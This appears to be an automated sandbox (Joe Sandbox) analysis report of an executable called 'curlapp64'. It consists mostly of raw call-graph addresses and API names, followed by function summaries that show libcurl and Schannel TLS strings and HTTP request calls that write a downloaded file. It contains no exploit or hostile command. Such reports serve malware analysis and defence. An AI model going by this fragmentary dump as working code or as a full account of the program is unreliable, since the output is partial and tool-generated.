95821 7ff8a93265f0 95821->95822 95823 7ff8a93265f6 free 95821->95823 95832 7ff8a932661f free 95822->95832 96155 7ff8a932b280 182 API calls _vfwprintf_l 95822->96155 95875 7ff8a9326ca2 95823->95875 95826 7ff8a9326747 free 95825->95826 95829 7ff8a932670a free 95825->95829 95825->95878 95833 7ff8a9326731 95826->95833 95827->95825 95828 7ff8a9334d90 10 API calls 95827->95828 95828->95825 95831 7ff8a9334d90 10 API calls 95829->95831 95831->95833 95832->95818 95832->95875 95834 7ff8a932681f 95833->95834 95837 7ff8a932679b free 95833->95837 95833->95878 95836 7ff8a93297f0 85 API calls 95834->95836 95843 7ff8a9326835 95836->95843 95838 7ff8a93267bf 95837->95838 95839 7ff8a93267b7 95837->95839 95841 7ff8a9334d90 10 API calls 95838->95841 95838->95878 96156 7ff8a93277b0 strchr strchr strchr 95839->96156 95842 7ff8a93267fc free 95841->95842 95842->95834 95842->95878 95844 7ff8a93268be 95843->95844 95845 7ff8a932689e free 95843->95845 95847 7ff8a93268ca 95843->95847 95843->95875 95848 7ff8a9317c20 9 API calls 95844->95848 95844->95878 95846 7ff8a9334d90 10 API calls 95845->95846 95846->95844 95847->95844 95850 7ff8a93268fd free 95847->95850 95849 7ff8a93269ed 95848->95849 95851 7ff8a9326c99 95849->95851 95854 7ff8a93299c0 34 API calls 95849->95854 95852 7ff8a9326924 95850->95852 95853 7ff8a9326917 95850->95853 96161 7ff8a9317c70 free 95851->96161 95852->95853 95856 7ff8a9326930 95852->95856 95857 7ff8a9334d90 10 API calls 95853->95857 95859 7ff8a9326a06 95854->95859 95858 7ff8a9334d90 10 API calls 95856->95858 95857->95844 95858->95844 95859->95851 95860 7ff8a9334d90 10 API calls 95859->95860 95864 7ff8a9326a68 95859->95864 95861 7ff8a9326a4c 95860->95861 95862 7ff8a9326a55 95861->95862 95861->95864 96157 7ff8a9317c70 free 95862->96157 95865 7ff8a9317c20 9 API calls 95864->95865 95866 7ff8a9326be1 free free free 95865->95866 95866->95851 95867 7ff8a9326c1c 95866->95867 95868 7ff8a9326c4e 95867->95868 95870 7ff8a9326c3e 95867->95870 95869 7ff8a9327df0 65 API calls 95868->95869 95871 7ff8a9326c5d 95869->95871 96158 7ff8a9317c70 free 95870->96158 95873 7ff8a9326e06 95871->95873 95891 7ff8a9326dbe SimpleString::operator= 95871->95891 96159 7ff8a933c720 _gmtime64 95871->96159 96164 7ff8a9317c70 free 95873->96164 95875->95878 96162 7ff8a9314a70 14 API calls 95875->96162 95877 7ff8a93270e0 13 API calls 95880 7ff8a9326ddf 95877->95880 95878->95816 95879 7ff8a9326c84 95881 7ff8a9326c8a 95879->95881 95882 7ff8a9326cdf 95879->95882 95880->95873 95884 7ff8a9329390 30 API calls 95880->95884 96160 7ff8a9314a70 14 API calls 95881->96160 95886 7ff8a9326cf5 95882->95886 95889 7ff8a9326d05 95882->95889 95889->95891 95891->95873 95891->95877 95893 7ff8a9326412 95892->95893 95894 7ff8a93233d0 8 API calls 95893->95894 95930 7ff8a9326429 95893->95930 95895 7ff8a9326438 95894->95895 95963 7ff8a9326ca2 95895->95963 96165 7ff8a9328bc0 95895->96165 95898 7ff8a9369e10 8 API calls 95899 7ff8a9326cc4 95898->95899 95899->95689 95900 7ff8a932644d 95901 7ff8a9326471 free 95900->95901 95902 7ff8a9326485 95900->95902 95900->95963 95901->95902 95903 7ff8a9334d90 10 API calls 95902->95903 95904 7ff8a932652d 95902->95904 95903->95904 95905 7ff8a9326584 free 95904->95905 95906 7ff8a932659d 95904->95906 95904->95930 95907 7ff8a932668e free 95905->95907 95910 7ff8a9326605 95906->95910 96188 7ff8a932b280 182 API calls _vfwprintf_l 95906->96188 95913 7ff8a93266db 95907->95913 95915 7ff8a93266ae 95907->95915 95909 7ff8a93265f0 95909->95910 95911 7ff8a93265f6 free 95909->95911 95919 7ff8a932661f free 95910->95919 96189 7ff8a932b280 182 API calls _vfwprintf_l 95910->96189 95911->95963 95914 7ff8a9326747 free 95913->95914 95917 7ff8a932670a free 95913->95917 95913->95930 95920 7ff8a9326731 95914->95920 95915->95913 95916 7ff8a9334d90 10 API calls 95915->95916 95916->95913 95918 7ff8a9334d90 10 API calls 95917->95918 95918->95920 95919->95907 95919->95963 95921 7ff8a932681f 95920->95921 95924 7ff8a932679b free 95920->95924 95920->95930 95923 7ff8a93297f0 85 API calls 95921->95923 95931 7ff8a9326835 95923->95931 95925 7ff8a93267bf 95924->95925 95926 7ff8a93267b7 95924->95926 95928 7ff8a9334d90 10 API calls 95925->95928 95925->95930 96190 7ff8a93277b0 strchr strchr strchr 95926->96190 95929 7ff8a93267fc free 95928->95929 95929->95921 95929->95930 95930->95898 95932 7ff8a93268be 95931->95932 95933 7ff8a932689e free 95931->95933 95935 7ff8a93268ca 95931->95935 95931->95963 95932->95930 95936 7ff8a9317c20 9 API calls 95932->95936 95934 7ff8a9334d90 10 API calls 95933->95934 95934->95932 95935->95932 95938 7ff8a93268fd free 95935->95938 95937 7ff8a93269ed 95936->95937 95939 7ff8a9326c99 95937->95939 95942 7ff8a93299c0 34 API calls 95937->95942 95940 7ff8a9326924 95938->95940 95941 7ff8a9326917 95938->95941 96195 7ff8a9317c70 free 95939->96195 95940->95941 95944 7ff8a9326930 95940->95944 95945 7ff8a9334d90 10 API calls 95941->95945 95947 7ff8a9326a06 95942->95947 95946 7ff8a9334d90 10 API calls 95944->95946 95945->95932 95946->95932 95947->95939 95948 7ff8a9334d90 10 API calls 95947->95948 95952 7ff8a9326a68 95947->95952 95949 7ff8a9326a4c 95948->95949 95950 7ff8a9326a55 95949->95950 95949->95952 95953 7ff8a9317c20 9 API calls 95952->95953 95954 7ff8a9326be1 free free free 95953->95954 95954->95939 95955 7ff8a9326c1c 95954->95955 95963->95930 96196 7ff8a9314a70 14 API calls 95963->96196 95979->95690 95980->95704 95981->95700 95982->95717 95983->95720 95984->95720 95985->95720 96092 7ff8a932b6a0 85 API calls 95986->96092 95988 7ff8a9329830 95990 7ff8a9329859 95988->95990 95997 7ff8a9329932 95988->95997 95989 7ff8a932980c 95989->95988 95992 7ff8a93298d8 95989->95992 95999 7ff8a9329919 95989->95999 96093 7ff8a93276d0 strchr strchr strchr 95990->96093 96094 7ff8a9314a70 14 API calls 95992->96094 95994 7ff8a93298ee 95994->95762 95995 7ff8a932987e 95995->95999 96000 7ff8a9314b60 18 API calls 95995->96000 95997->95999 96095 7ff8a9314a70 14 API calls 95997->96095 95998 7ff8a93299a9 95998->95762 95999->95762 96000->95999 96096 7ff8a9334cc0 9 API calls 96001->96096 96003 7ff8a9317c3d 96003->95770 96004 7ff8a93299c0 96003->96004 96005 7ff8a9329a10 96004->96005 96009 7ff8a9329bb1 SimpleString::operator= 96004->96009 96006 7ff8a9329a1d 96005->96006 96005->96009 96097 7ff8a9359e10 22 API calls 96006->96097 96008 7ff8a9329bd9 96008->95776 96009->96008 96012 7ff8a9317c20 9 API calls 96009->96012 96010 7ff8a9329a29 96011 7ff8a9329b9a 96010->96011 96013 7ff8a9329ba2 96010->96013 96098 7ff8a9359f80 8 API calls 96010->96098 96011->96008 96012->96008 96100 7ff8a9359de0 11 API calls 96013->96100 96016 7ff8a9329ad4 96016->96013 96017 7ff8a9329adc 96016->96017 96099 7ff8a9359de0 11 API calls 96017->96099 96081->95740 96082->95751 96083->95757 96084->95797 96088->95794 96089->95797 96092->95989 96093->95995 96094->95994 96095->95998 96096->96003 96097->96010 96098->96016 96100->96011 96154->95821 96155->95832 96156->95838 96157->95878 96158->95878 96159->95879 96160->95851 96161->95875 96162->95878 96164->95875 96166 7ff8a9328beb free _strdup 96165->96166 96167 7ff8a9328c12 free 96165->96167 96166->96167 96178 7ff8a9328d4d 96166->96178 96171 7ff8a9328c69 96167->96171 96169 7ff8a9328ccd 96172 7ff8a9328de5 96169->96172 96174 7ff8a9328d15 96169->96174 96170 7ff8a9328c99 96199 7ff8a93277b0 strchr strchr strchr 96170->96199 96171->96169 96171->96170 96176 7ff8a9334d90 10 API calls 96172->96176 96175 7ff8a9334d90 10 API calls 96174->96175 96175->96178 96176->96178 96177 7ff8a9328ca8 96177->96178 96179 7ff8a9328cbf free 96177->96179 96180 7ff8a9328d52 96177->96180 96178->95900 96186 7ff8a9328daf 96179->96186 96181 7ff8a9328d7f 96180->96181 96183 7ff8a9328d69 memmove 96180->96183 96182 7ff8a9328d84 strchr 96181->96182 96184 7ff8a9328d91 96182->96184 96185 7ff8a9328d94 free 96182->96185 96183->96182 96184->96185 96185->96186 96186->96178 96187 7ff8a9334d90 10 API calls 96186->96187 96187->96178 96188->95909 96189->95919 96190->95925 96195->95963 96196->95930 96199->96177 96200 7ff6cabe3c98 96201 7ff6cabe3ca8 96200->96201 96217 7ff6cabf37b0 96201->96217 96203 7ff6cabe3cb4 96223 7ff6cabe42c4 96203->96223 96205 7ff6cabe3d21 96216 7ff6cabe3d3d 96205->96216 96255 7ff6cabe491c 7 API calls 2 library calls 96205->96255 96207 7ff6cabe3ccc _RTC_Initialize 96207->96205 96228 7ff6cabe4474 96207->96228 96208 7ff6cabe3d4d 96210 7ff6cabe3ce1 96231 7ff6cabf2ff8 96210->96231 96218 7ff6cabf37c1 96217->96218 96222 7ff6cabf37c9 96218->96222 96256 7ff6cabeea40 13 API calls _Strcoll 96218->96256 96220 7ff6cabf37d8 96257 7ff6cabf1858 69 API calls _invalid_parameter_noinfo_noreturn 96220->96257 96222->96203 96224 7ff6cabe42d5 96223->96224 96227 7ff6cabe42da __scrt_release_startup_lock 96223->96227 96224->96227 96258 7ff6cabe491c 7 API calls 2 library calls 96224->96258 96226 7ff6cabe434e 96227->96207 96259 7ff6cabe4438 96228->96259 96230 7ff6cabe447d 96230->96210 96232 7ff6cabf3018 96231->96232 96239 7ff6cabe3ced 96231->96239 96233 7ff6cabf3020 96232->96233 96234 7ff6cabf3036 GetModuleFileNameW 96232->96234 96264 7ff6cabeea40 13 API calls _Strcoll 96233->96264 96238 7ff6cabf3061 96234->96238 96236 7ff6cabf3025 96265 7ff6cabf1858 69 API calls _invalid_parameter_noinfo_noreturn 96236->96265 96266 7ff6cabf2f98 13 API calls 2 library calls 96238->96266 96239->96205 96254 7ff6cabe48c4 InitializeSListHead 96239->96254 96241 7ff6cabf30a1 96242 7ff6cabf30a9 96241->96242 96244 7ff6cabf30ba 96241->96244 96267 7ff6cabeea40 13 API calls _Strcoll 96242->96267 96246 7ff6cabf311f 96244->96246 96247 7ff6cabf3106 96244->96247 96252 7ff6cabf30ae 96244->96252 96270 7ff6cabf74f0 13 API calls 2 library calls 96246->96270 96268 7ff6cabf74f0 13 API calls 2 library calls 96247->96268 96249 7ff6cabf310f 96269 7ff6cabf74f0 13 API calls 2 library calls 96249->96269 96271 7ff6cabf74f0 13 API calls 2 library calls 96252->96271 96253 7ff6cabf311b 96253->96239 96255->96208 96256->96220 96257->96222 96258->96226 96260 7ff6cabe4452 96259->96260 96262 7ff6cabe444b 96259->96262 96263 7ff6cabf55f0 72 API calls 96260->96263 96262->96230 96263->96262 96264->96236 96265->96239 96266->96241 96267->96252 96268->96249 96269->96253 96270->96252 96271->96239 96272 7ff6cabf3174 96273 7ff6cabf318d 96272->96273 96284 7ff6cabf3189 96272->96284 96285 7ff6cabfe3ac GetEnvironmentStringsW 96273->96285 96276 7ff6cabf319a 96293 7ff6cabf74f0 13 API calls 2 library calls 96276->96293 96277 7ff6cabf31a6 96294 7ff6cabf31e4 69 API calls 4 library calls 96277->96294 96280 7ff6cabf31ae 96295 7ff6cabf74f0 13 API calls 2 library calls 96280->96295 96282 7ff6cabf31cd 96296 7ff6cabf74f0 13 API calls 2 library calls 96282->96296 96286 7ff6cabf3192 96285->96286 96287 7ff6cabfe3d0 96285->96287 96286->96276 96286->96277 96297 7ff6cabf86d0 14 API calls 3 library calls 96287->96297 96291 7ff6cabfe407 ctype 96298 7ff6cabf74f0 13 API calls 2 library calls 96291->96298 96292 7ff6cabfe427 FreeEnvironmentStringsW 96292->96286 96293->96284 96294->96280 96295->96282 96296->96284 96297->96291 96298->96292 96299 7ff8a9302940 96300 7ff8a9334eb0 8 API calls 96299->96300 96301 7ff8a930297f 96300->96301 96318 7ff8a93116f0 getaddrinfo 96301->96318 96304 7ff8a93029be EnterCriticalSection 96308 7ff8a93029cd LeaveCriticalSection 96304->96308 96309 7ff8a93029e9 96304->96309 96305 7ff8a930299b WSAGetLastError 96306 7ff8a93029a5 WSAGetLastError 96305->96306 96307 7ff8a93029b2 96305->96307 96306->96304 96306->96307 96307->96304 96333 7ff8a93028c0 DeleteCriticalSection free free closesocket free 96308->96333 96311 7ff8a93029f3 send 96309->96311 96312 7ff8a9302a19 LeaveCriticalSection 96309->96312 96311->96312 96314 7ff8a9302a10 WSAGetLastError 96311->96314 96315 7ff8a9302a29 96312->96315 96313 7ff8a93029de free 96313->96315 96314->96312 96316 7ff8a9369e10 8 API calls 96315->96316 96317 7ff8a9302a38 96316->96317 96320 7ff8a931171d 96318->96320 96329 7ff8a9302995 96318->96329 96319 7ff8a931186e WSASetLastError 96319->96329 96320->96319 96321 7ff8a9311822 96320->96321 96324 7ff8a931179a malloc 96320->96324 96322 7ff8a931183e freeaddrinfo 96321->96322 96323 7ff8a9311844 96321->96323 96322->96323 96325 7ff8a9311869 96323->96325 96326 7ff8a9311849 96323->96326 96327 7ff8a93117af memmove 96324->96327 96328 7ff8a9311824 96324->96328 96325->96319 96325->96329 96326->96329 96332 7ff8a9311850 free 96326->96332 96330 7ff8a93117eb memmove 96327->96330 96331 7ff8a9311802 96327->96331 96328->96321 96329->96304 96329->96305 96330->96331 96331->96320 96332->96329 96332->96332 96333->96313 96334 7ff8a9302380 96335 7ff8a93023cd 96334->96335 96336 7ff8a93023c8 96334->96336 96338 7ff8a9353b60 2 API calls 96335->96338 96337 7ff8a93243b0 2 API calls 96336->96337 96337->96335 96339 7ff8a930241b 96338->96339 96344 7ff8a9302a50 calloc 96339->96344 96342 7ff8a930243a 96345 7ff8a9302bf4 _errno 96344->96345 96346 7ff8a9302aa1 malloc 96344->96346 96372 7ff8a9302436 96345->96372 96347 7ff8a9302b22 InitializeCriticalSectionEx 96346->96347 96354 7ff8a9302b53 96346->96354 96383 7ff8a934b3f0 socket 96347->96383 96349 7ff8a9302b6d closesocket 96350 7ff8a9302b7b 96349->96350 96352 7ff8a9302b94 free 96350->96352 96353 7ff8a9302b84 DeleteCriticalSection free 96350->96353 96356 7ff8a9302ba7 96352->96356 96357 7ff8a9302bac 96352->96357 96353->96352 96354->96349 96354->96350 96355 7ff8a9302c1c _strdup 96355->96354 96358 7ff8a9302c36 free _strdup 96355->96358 96417 7ff8a93116c0 free 96356->96417 96360 7ff8a9302bb6 closesocket 96357->96360 96361 7ff8a9302bbc free 96357->96361 96362 7ff8a9302c84 96358->96362 96363 7ff8a9302c58 96358->96363 96360->96361 96361->96345 96365 7ff8a9302d02 free 96362->96365 96366 7ff8a9302c90 EnterCriticalSection LeaveCriticalSection 96362->96366 96415 7ff8a93148e0 _beginthreadex 96363->96415 96365->96345 96368 7ff8a9302ccb 96366->96368 96369 7ff8a9302cba 96366->96369 96370 7ff8a9302cd0 96368->96370 96371 7ff8a9302cd8 96368->96371 96418 7ff8a9314920 CloseHandle 96369->96418 96419 7ff8a9314930 WaitForSingleObjectEx CloseHandle 96370->96419 96420 7ff8a93028c0 DeleteCriticalSection free free closesocket free 96371->96420 96372->96342 96382 7ff8a9314a70 14 API calls 96372->96382 96373 7ff8a9302c74 _errno 96373->96362 96377 7ff8a9302cc2 96379 7ff8a9302cee 96377->96379 96378 7ff8a9302ce1 free 96378->96379 96421 7ff8a93378b0 free 96379->96421 96381 7ff8a9302cf9 closesocket 96381->96365 96382->96342 96384 7ff8a934b43f htonl setsockopt 96383->96384 96385 7ff8a934b43a 96383->96385 96386 7ff8a934b4c4 bind 96384->96386 96387 7ff8a934b661 closesocket closesocket closesocket 96384->96387 96389 7ff8a9369e10 8 API calls 96385->96389 96386->96387 96388 7ff8a934b4e0 getsockname 96386->96388 96387->96385 96388->96387 96391 7ff8a934b4fa 96388->96391 96390 7ff8a9302b4b 96389->96390 96390->96354 96390->96355 96391->96387 96392 7ff8a934b504 listen 96391->96392 96392->96387 96393 7ff8a934b51b socket 96392->96393 96393->96387 96394 7ff8a934b538 connect 96393->96394 96394->96387 96395 7ff8a934b554 96394->96395 96422 7ff8a933c2d0 ioctlsocket 96395->96422 96397 7ff8a934b561 96397->96387 96398 7ff8a9342110 17 API calls 96397->96398 96399 7ff8a934b588 accept 96398->96399 96399->96387 96400 7ff8a934b5a4 96399->96400 96401 7ff8a9353b60 2 API calls 96400->96401 96402 7ff8a934b5ad 96401->96402 96402->96387 96403 7ff8a934b5cf send 96402->96403 96407 7ff8a934b5e2 96403->96407 96404 7ff8a9342110 17 API calls 96405 7ff8a934b605 recv 96404->96405 96406 7ff8a934b625 WSAGetLastError 96405->96406 96405->96407 96408 7ff8a9353b60 2 API calls 96406->96408 96407->96387 96407->96404 96409 7ff8a934b6cf 96407->96409 96408->96407 96409->96387 96410 7ff8a934b717 closesocket 96409->96410 96423 7ff8a933c2d0 ioctlsocket 96409->96423 96410->96385 96412 7ff8a934b6f9 96412->96387 96424 7ff8a933c2d0 ioctlsocket 96412->96424 96416 7ff8a9302c6c 96415->96416 96416->96372 96416->96373 96417->96357 96418->96377 96419->96371 96420->96378 96421->96381 96422->96397 96423->96412 96425 7ff8a930c0b0 96426 7ff8a930c0f1 96425->96426 96427 7ff8a930c0e6 96425->96427 96428 7ff8a930c0fb 96426->96428 96456 7ff8a930dd20 21 API calls 96426->96456 96429 7ff8a9369e10 8 API calls 96427->96429 96428->96427 96439 7ff8a930d570 96428->96439 96432 7ff8a930c253 96429->96432 96434 7ff8a930d280 4 API calls 96435 7ff8a930c17b 96434->96435 96436 7ff8a933ef80 2 API calls 96435->96436 96437 7ff8a930c1a2 96435->96437 96436->96437 96437->96427 96438 7ff8a9314bb0 14 API calls 96437->96438 96438->96427 96455 7ff8a930d5d0 96439->96455 96440 7ff8a9353b60 2 API calls 96440->96455 96441 7ff8a930db9c 96442 7ff8a9314bb0 14 API calls 96441->96442 96449 7ff8a930c13a 96441->96449 96446 7ff8a930dbc3 96442->96446 96443 7ff8a930d709 WSASetLastError 96443->96455 96444 7ff8a930dcbc 96459 7ff8a9314a70 14 API calls 96444->96459 96445 7ff8a9314bb0 14 API calls 96445->96446 96446->96445 96451 7ff8a930dc0d 96446->96451 96447 7ff8a9314b60 18 API calls 96447->96455 96449->96427 96449->96434 96450 7ff8a9314bb0 14 API calls 96450->96455 96458 7ff8a9314a70 14 API calls 96451->96458 96452 7ff8a930d0d0 21 API calls 96452->96455 96455->96440 96455->96441 96455->96443 96455->96444 96455->96447 96455->96449 96455->96450 96455->96452 96457 7ff8a93374f0 20 API calls 96455->96457 96456->96428 96457->96455 96458->96449 96459->96449 96460 7ff8a930c530 96461 7ff8a930c557 96460->96461 96462 7ff8a930c569 96460->96462 96464 7ff8a930c5f3 96462->96464 96465 7ff8a930c621 calloc 96462->96465 96470 7ff8a930c608 96462->96470 96472 7ff8a930c8cc 96462->96472 96473 7ff8a930c646 96462->96473 96479 7ff8a934bb90 calloc 96462->96479 96480 7ff8a9364270 6 API calls 96462->96480 96483 7ff8a93641c0 6 API calls 96462->96483 96467 7ff8a9314bb0 14 API calls 96464->96467 96466 7ff8a930c8a6 96465->96466 96465->96473 96469 7ff8a930c8ab free free 96466->96469 96467->96470 96469->96470 96484 7ff8a9314a70 14 API calls 96472->96484 96473->96462 96473->96469 96473->96470 96478 7ff8a9308360 calloc 96473->96478 96481 7ff8a932e8b0 calloc calloc free 96473->96481 96482 7ff8a9304da0 calloc free calloc free 96473->96482 96478->96473 96479->96462 96480->96462 96481->96473 96482->96473 96483->96462 96484->96470

                                                                                                                                Executed Functions

                                                                                                                                Function 00007FF8A93604A6 Relevance: 177.7, APIs: 57, Strings: 44, Instructions: 927COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressHandleModuleProcfree
                                                                                                                                • String ID: $ $$$(memory blob)$(unknown)$@$AES$CHACHA20_POLY1305$ChainingModeCCM$ChainingModeGCM$CurrentService$CurrentUser$CurrentUserGroupPolicy$LocalMachine$LocalMachineEnterprise$LocalMachineGroupPolicy$Microsoft Unified Security Protocol Provider$P12$SCH_USE_STRONG_CRYPTO$SHA256$SHA384$Services$TLS_AES_128_CCM_8_SHA256$TLS_AES_128_CCM_SHA256$TLS_AES_128_GCM_SHA256$TLS_AES_256_GCM_SHA384$TLS_CHACHA20_POLY1305_SHA256$USE_STRONG_CRYPTO$Users$schannel: AcquireCredentialsHandle failed: %s$schannel: All available TLS 1.3 ciphers were disabled$schannel: Failed setting algorithm cipher list$schannel: Failed to get certificate from file %s, last error is 0x%lx$schannel: Failed to get certificate location or file for %s$schannel: Failed to import cert file %s, last error is 0x%lx$schannel: Failed to import cert file %s, password is bad$schannel: Failed to open cert store %lx %s, last error is 0x%lx$schannel: Failed to read cert file %s$schannel: TLS 1.3 not supported on Windows prior to 11$schannel: This version of Schannel does not support setting an algorithm cipher list and TLS 1.3 cipher list at the same time$schannel: Unknown TLS 1.3 cipher: %.*s$schannel: WARNING: This version of Schannel may negotiate a less-secure TLS version than TLS 1.3 because the user set an algorithm cipher list.$schannel: certificate format compatibility error for %s$schannel: unable to allocate memory
                                                                                                                                • API String ID: 3799942571-230586194
                                                                                                                                • Opcode ID: 64750cf7fc75ecf1a52b74ce0a571676b61e8a684627b3f2986ccd449495d6e1
                                                                                                                                • Instruction ID: 74cd0af8dbde97e3e72c483e43f835903c384da4a88928773214a515c6091717
                                                                                                                                • Opcode Fuzzy Hash: 64750cf7fc75ecf1a52b74ce0a571676b61e8a684627b3f2986ccd449495d6e1
                                                                                                                                • Instruction Fuzzy Hash: 48927E21A0EFC2A5EB508F66A9503BAA7B1FB457C8F046135DB4D87AA4EF7CE544C700
                                                                                                                                Function 00007FF6CABB5040 Relevance: 47.7, APIs: 17, Strings: 10, Instructions: 474COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 516 7ff6cabb5040-7ff6cabb5087 517 7ff6cabb5089 516->517 518 7ff6cabb508c-7ff6cabb5127 curl_easy_setopt * 6 516->518 517->518 519 7ff6cabb5141 518->519 520 7ff6cabb5129-7ff6cabb512f 518->520 522 7ff6cabb5144-7ff6cabb5173 curl_easy_setopt 519->522 521 7ff6cabb5131-7ff6cabb5134 520->521 520->522 521->519 523 7ff6cabb5136-7ff6cabb513d 521->523 524 7ff6cabb5190 522->524 525 7ff6cabb5175-7ff6cabb517b 522->525 523->521 526 7ff6cabb513f 523->526 527 7ff6cabb5193-7ff6cabb51b6 curl_easy_setopt curl_easy_perform 524->527 525->527 528 7ff6cabb517d 525->528 526->522 530 7ff6cabb5213-7ff6cabb5252 curl_easy_getinfo * 2 527->530 531 7ff6cabb51b8-7ff6cabb51d8 curl_easy_strerror 527->531 529 7ff6cabb5180-7ff6cabb5183 528->529 529->524 534 7ff6cabb5185-7ff6cabb518c 529->534 532 7ff6cabb53a8 530->532 533 7ff6cabb5258-7ff6cabb525f 530->533 535 7ff6cabb51e0-7ff6cabb51e7 531->535 537 7ff6cabb53ad 532->537 533->532 538 7ff6cabb5265-7ff6cabb5278 533->538 534->529 539 7ff6cabb518e 534->539 535->535 536 7ff6cabb51e9-7ff6cabb520e call 7ff6cabbb6c0 535->536 547 7ff6cabb573a-7ff6cabb575f call 7ff6cabe3b30 536->547 541 7ff6cabb53b0-7ff6cabb53b5 537->541 542 7ff6cabb5280-7ff6cabb5287 538->542 539->527 544 7ff6cabb53f2-7ff6cabb53f5 541->544 545 7ff6cabb53b7-7ff6cabb53bf 541->545 542->542 546 7ff6cabb5289-7ff6cabb52ba call 7ff6cabbb6c0 542->546 550 7ff6cabb56ab-7ff6cabb5737 call 7ff6cabc0460 544->550 551 7ff6cabb53fb-7ff6cabb5427 curl_easy_setopt call 7ff6cac06460 544->551 545->544 548 7ff6cabb53c1-7ff6cabb53cf 545->548 561 7ff6cabb5323-7ff6cabb5338 546->561 562 7ff6cabb52bc-7ff6cabb52c7 546->562 553 7ff6cabb53d1-7ff6cabb53e4 548->553 554 7ff6cabb53ea-7ff6cabb53ed call 7ff6cabe3b50 548->554 550->547 567 7ff6cabb5429 551->567 568 7ff6cabb542c-7ff6cabb5463 call 7ff6cabb84c0 551->568 553->554 559 7ff6cabb57b0-7ff6cabb57b5 call 7ff6cabf1878 553->559 554->544 561->537 565 7ff6cabb533a-7ff6cabb5359 call 7ff6cac05c20 561->565 566 7ff6cabb52ca-7ff6cabb52d7 call 7ff6cac05c20 562->566 565->537 579 7ff6cabb535b 565->579 566->561 580 7ff6cabb52d9-7ff6cabb52fa 566->580 567->568 577 7ff6cabb5469-7ff6cabb54f8 call 7ff6cabbb6c0 call 7ff6cabb74d0 call 7ff6cabe2b94 568->577 578 7ff6cabb54fd-7ff6cabb551e curl_easy_setopt curl_easy_perform call 7ff6cabb83c0 568->578 577->547 589 7ff6cabb5523-7ff6cabb5526 578->589 582 7ff6cabb5360-7ff6cabb5377 call 7ff6cac06360 579->582 584 7ff6cabb5308-7ff6cabb5315 580->584 585 7ff6cabb52fc-7ff6cabb5300 580->585 597 7ff6cabb5379-7ff6cabb5397 call 7ff6cac05c20 582->597 598 7ff6cabb539b-7ff6cabb53a1 582->598 584->566 585->584 586 7ff6cabb5302-7ff6cabb5306 585->586 586->584 590 7ff6cabb5317-7ff6cabb531d 586->590 593 7ff6cabb5528-7ff6cabb5553 589->593 594 7ff6cabb5559-7ff6cabb555b 589->594 590->561 595 7ff6cabb53a3-7ff6cabb53a6 590->595 593->594 599 7ff6cabb5760-7ff6cabb5762 593->599 600 7ff6cabb5561-7ff6cabb557a curl_easy_strerror 594->600 601 7ff6cabb561a-7ff6cabb56a6 call 7ff6cabbb6c0 call 7ff6cabb74d0 call 7ff6cabe2b94 594->601 595->541 597->582 616 7ff6cabb5399 597->616 598->537 598->595 602 7ff6cabb5764-7ff6cabb576b 599->602 603 7ff6cabb576d-7ff6cabb577d 599->603 607 7ff6cabb5580-7ff6cabb5587 600->607 601->547 608 7ff6cabb5781-7ff6cabb57af call 7ff6cabb13c0 call 7ff6cabb1d30 call 7ff6cabe5b70 602->608 603->608 607->607 612 7ff6cabb5589-7ff6cabb5615 call 7ff6cabbb6c0 call 7ff6cabb74d0 call 7ff6cabe2b94 607->612 608->559 612->547 616->537
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: curl_easy_setopt$curl_easy_getinfocurl_easy_performcurl_easy_strerror$_invalid_parameter_noinfo_noreturn
                                                                                                                                • String ID: "$File could not be created.$Response code: {} Content Type: {}$applicat$ion/octe$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$t-stream$text/plain; charset=utf-8
                                                                                                                                • API String ID: 4244892839-2565517602
                                                                                                                                • Opcode ID: e6261ac78c1bba6af93ee69fe5615f221062075fc40a5810cfd3e81eb06f3c64
                                                                                                                                • Instruction ID: 55176de33289c216f3876326e3facee14e6b9079219e1e65dc2a97dd47f258e0
                                                                                                                                • Opcode Fuzzy Hash: e6261ac78c1bba6af93ee69fe5615f221062075fc40a5810cfd3e81eb06f3c64
                                                                                                                                • Instruction Fuzzy Hash: F222AD72B08B8586EB108F24E9A02BD67B0FB85789F444672DB8E93B95DF78E545C700
                                                                                                                                Function 00007FF8A9356B50 Relevance: 46.0, APIs: 14, Strings: 12, Instructions: 539COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
